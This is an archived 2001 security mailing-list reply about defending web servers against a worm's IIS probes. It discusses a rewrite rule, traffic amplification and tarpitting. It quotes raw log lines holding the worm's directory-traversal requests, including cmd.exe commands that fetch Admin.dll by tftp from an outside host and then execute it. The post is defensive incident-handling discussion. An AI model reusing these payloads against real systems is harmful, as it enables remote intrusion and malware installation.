On Wed, 19 Sep 2001, George Milliken wrote: > Maybe something like a rewrite rule > > RewriteEngine On > RewriteRule ^.*/cmd.exe.* [FL] > RewriteRule ^.*/root.exe.* [FL] > > This will send "forbidden" to systems trying those URLs and will stop > rewrite processing. > Actually this may increase the load to those servers. When the worm's probe recieves anything other than a 404 (not found) it makes several other requests to the server to exploit the machines. It first trys to copy the Admin.dll to the c:, d:, and e: drives: 216.156.1.151 - - [19/Sep/2001:12:30:13 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 51 "-" "-" 216.156.1.151 - - [19/Sep/2001:12:31:28 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20216.22.197.29%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 51 "-" "-" 216.156.1.151 - - [19/Sep/2001:12:32:43 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20216.22.197.29%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 51 "-" "-" 216.156.1.151 - - [19/Sep/2001:12:33:58 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20216.22.197.29%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 51 "-" "-" The worm then attempts to execute the Admin.dll 216.156.1.151 - - [19/Sep/2001:12:35:13 -0700] "GET /scripts/..%c1%1c../Admin.dll HTTP/1.0" 200 51 "-" "-" This has the effect of increasing the traffic about 5 fold. The worm also will continue to probe/exploit the machine after it gets a "hit" so a machine that returns 403 (forbidden) for each of the 16 attacks would get about 80 hits to their website from each machine. Playing around with some cgi scripts that tarpit requests it looks like the worm's tcp connections time out after 1 minute 30 seconds without a response. By sleeping my script for about 1 minute 15 seconds I can hold a machine in my "tarpit" for about an hour and a half. Does anybody know if this thing is single threaded? ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Wed Sep 19 2001 - 14:48:52 PDT